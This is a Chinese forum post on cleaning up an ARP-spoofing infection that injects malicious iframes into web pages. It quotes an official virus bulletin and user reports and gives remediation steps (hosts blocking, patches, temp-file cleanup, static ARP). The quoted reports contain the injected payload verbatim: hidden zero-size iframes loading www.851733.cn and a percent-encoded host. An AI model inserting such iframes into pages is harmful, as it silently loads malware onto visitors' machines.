ARP地址www.851733.cn欺骗解决之道

ARP地址www.851733.cn欺骗解决之道

因为EXCEL之家目前是微软在线社区联盟成员，非常正规的网站，个人感觉不可能发生这种事情，于是在自己的机子上进入“EXCEL之家”〔我的系统是东海大哥的6.0（呵呵！一直很好），浏览器是GOSURF2.76.705.8238绿色版〕，就在进入网站的最初阶段，突然发现在浏览器的状态栏几次闪动www.851733.cn，卡巴提示网页有恶意代码，然后才是进入了“EXCEL之家”，看来应该是www.851733.cn在作怪！
    接着用google搜索，确定是遭受了“ARP地址欺骗”病毒新变种的感染，其中搜索到有用的网页内容如下：
其一：
    新华网天津6月24日电  国家计算机病毒应急处理中心24日预报说，6月25日至7月1日一周内将要定期发作的计算机病毒都没有大的影响。但近期一些局域网用户遭受了“ARP地址欺骗”病毒新变种的感染。
    据介绍，该病毒变种除具备以往ARP病毒发作的特征，如局域网内部分计算机不能正常上网，或是所有计算机均不能上网，还有无法打开Web网页或打开Web网页速度较慢以及局域网链接时断时续并且网速较慢等现象以外，还会向局域网内发送伪造的ARP欺骗广播，并将受感染的计算机系统伪装成局域网网关。当局域网中的计算机系统发出访问Web网页请求的时候，伪装成网关的计算机系统会把Web网页下载下来并在其中添加一段恶意地址代码一并发送给发出请求的计算机，造成该计算机系统访问Web网站时会主动链接该恶意网址。
    如果操作系统存在漏洞，就会在访问的计算机系统中植入木马程序，使得计算机系统遭到进一步的破坏，最终导致整个局域网成为“僵尸网络”。
    国家计算机病毒应急处理中心建议广大计算机用户采取如下针对性防范措施：
    1、立即升级操作系统中的防病毒软件和防火墙，同时打开“实时监控”功能，实时地拦截来自局域网络上的各种ARP病毒变种。
    2、立即下载微软MS06-014（KB911562）和MS07-017(KB925902)两个系统漏洞补丁程序，将补丁程序安装到局域网络中存在这两个漏洞的计算机系统中，防止病毒变种的感染和传播。
其二：
    现象：只要一打开网页，杀毒软件就报警
    由于用的是 Antivir，报警声音从pc-speaker发出来，办公室里一大堆电脑都在滴滴答答狂叫不开网页，查不出毒打开的网页里头上会有 <iframe WIDTH="0" border="0" width="0" height="0" src='http://www.851733.cn/。打开 google 和 yahoo 也没问题，所以还以为全世界除了google 和 yahoo，所有网站都中毒了，后来才发现是arp欺骗，某个机器中毒，成为网关，并在转发的所有http数据里添加了代码。
其三：
    公司每台电脑打开，杀毒软件都提示在http://www.851733.cn/htm/2007.bmp发现病毒。
其四：
    有个851733的病毒,打开baidu hao123等就会自动打开www.851733.cn的网站并造成IE当死,但奇怪打开google就不会,打开本站www.pc-hospital.net也不会,这是什么原因呢?难道是baidu中毒了?不可能吧,用GHOST镜像系统还原无效,重装系统也无效,杀毒软件查不出!
        最后使出了最后一招,备份了我整个硬盘的分区表,然后对系统分区整个分区进行写零,然后恢复分区表再把镜像还原,OK。搞掂！
    851733死光光不再泛滥！！~！~！~！~！
其五：
    最近中了流氓病毒，所有htm文件中最后均被插入流氓语句，打开任何htm文件都会使系统连接到流氓网站下载病毒。机器里好几百个htm文件，包括office等软件中安装的htm文件都被感染。虽然下载下来的病毒可以清理，但这好几百个htm文件手动清楚流氓语句，想想就头疼。而且手动清除完了，再中招又全都被感染了
有高人能指点高招可以批量清除吗？
<IfrAmE  src=http://www.851733.cn/htm/htm.htm  width=0  height=0 > </IfrAmE >                                                         
<IfrAmE  src=http://%6C%6C%38%30%2E%63%6F%6D/xx/ip.htm  width=100  height=0 > </IfrAmE >
<IfrAmE  src=http://www.851733.cn/htm/htm.htm  width=0  height=0 > </IfrAmE >                                                         
<IfrAmE  src=http://%6C%6C%38%30%2E%63%6F%6D/xx/ip.htm  width=100  height=0 > </IfrAmE >
<IfrAmE  src=http://www.851733.cn/htm/htm.htm  width=0  height=0 > </IfrAmE >

今天在家里，继续寻找解决问题的办法，根据经验，做了以下工作：

一、搜索有关www.851733.cn的信息
    1.最好是有www.851733.cn的专杀工具，很遗憾！似乎没能遭到！但是找到了有关“ARP地址欺骗”防御方法的文章，《解决局域网ARP欺骗和攻击方法》、《Windows系统Hosts文件的作用和特殊的IP地址介绍》〔我已经整理为DOC文档，本文附件RAR下载：〕
2.www.851733.cn网站信息总览中国网站排名
    看看中国互联网协会的链接：http://www.chinarank.org.cn/overview/Info.do?url=www.851733.cn&r=1186127789560，估计www.851733.cn是为了中国网站排名才使用了这么下流的方法，因为在大家访问baidu、hao123、excelhome等著名网站的时候会自动访问www.851733.cn，从而提高网站排名。

二、处理过程
    根据文章《解决局域网ARP欺骗和攻击方法》、《Windows系统Hosts文件的作用和特殊的IP地址介绍》对相关设置进行修改。具体内容较多，请自行浏览^_^，我只告诉大家应急的办法。
    1.修改hosts文件
    在C:\WINDOWS\system32\drivers\etc有个 hosts文件（没有后缀名）
    Hosts文件原内容如下（可能有所不同）：
    127.0.0.1      localhost
    Hosts文件增加内容后如下：
    127.0.0.1      localhost
    127.0.0.1      www.851733.cn
    127.0.0.1      www.wb900.com
    然后保存，意思是在连接网页时将ww.851733.cn的连接指向自己本机的IP：127.0.0.1，从而达到屏蔽ww.851733.cn的作用。www.wb900.com另一个类似的。具体看上面的两篇文章。
    2.下载并安装补丁。
    根据上面国家计算机病毒应急处理中心建议下载并安装补丁，为方便大家，我已经下载了补丁，本文附件本地下载：
    MS06-014（KB911562）补丁：WindowsXP-KB911562-x86-CHS.exe  （2个文件）
    MS07-017(KB925902) 补丁：WindowsXP-KB925902-x86-CHS.exe    （4个文件）
    3.删除Internet临时文件
    一般XP设置的Internet临时文件在C:\Documents and Settings\用户名\Local Settings\Temporary Internet Files\内，利用IE浏览器Internet选项→常规内的删除Cookies、删除文件（勾选删除所有脱机内容）清除，也可以利用360的清理使用痕迹内的选项进行清除，但是360不一定能够清理干净，必须将C:\Documents and Settings\所有用户名\Local Settings\Temporary Internet Files\Content.IE5\下的文件夹全部删除，只保留index.dat、desktop.ini。（需要在文件夹选项下的查看里取消“隐藏受保护的操作系统文件（推荐）”和勾选“显示所有文件和文件夹”）。
注意：如果你用yyy的管理员帐号登录，有时C:\Documents and Settings\yyy\Local Settings\Temporary Internet Files\下并不会显示Content.IE5文件夹，可以在资源管理器的地址栏显示的“C:\Documents and Settings\yyy\Local Settings\Temporary Internet Files” 后面加上\Content.IE5，然后回车，即可见隐藏的文件夹和里面的内容。
    4.安装360TimeProtect时间保护工具
    进行时间保护，防止被恶意更改时间，具体看说明。
    本文附件本地下载：
    360TimeProt.part1.rar  360TimeProt.part2.rar  360TimeProtect时间保护工具说明.rar （3个文件）
    5.最终解决ARP欺骗和攻击
    按照两篇文章的内容，明天到公司大开杀戒！

三、写在后面的话
    从用了东海大哥的XP后，之前我很少会在论坛里花费时间，是非常标准的潜水员！但是，也是论坛改变了我的态度，因为在论坛里学到了很多东西。所以，非常希望大家能够为论坛出些力。
    但是，不得不说的是，我非常不习惯看到动不动就提问发帖子，引用别人的话叫“弱弱的问题”，因为我发现大多数问题其实只要用google、baidu搜一搜，完全可以得到满意的答案，有时候见到这类提问虽然回复了，可是总是觉得这些朋友似乎懒了点！
    这也是为什么这次我把详细过程都写出来的原因。


注意：
C:\WINDOWS\system32\drivers\etc\下的hosts文件和《解决局域网ARP欺骗和攻击方法》文中涉及的static_arp.bat批处理文件一定要在更改后加只读属性，否则机子重启后会被修改。

(hosts、static_arp.bat已经加只读属性并打包上传，解压后放入相应的目录即可)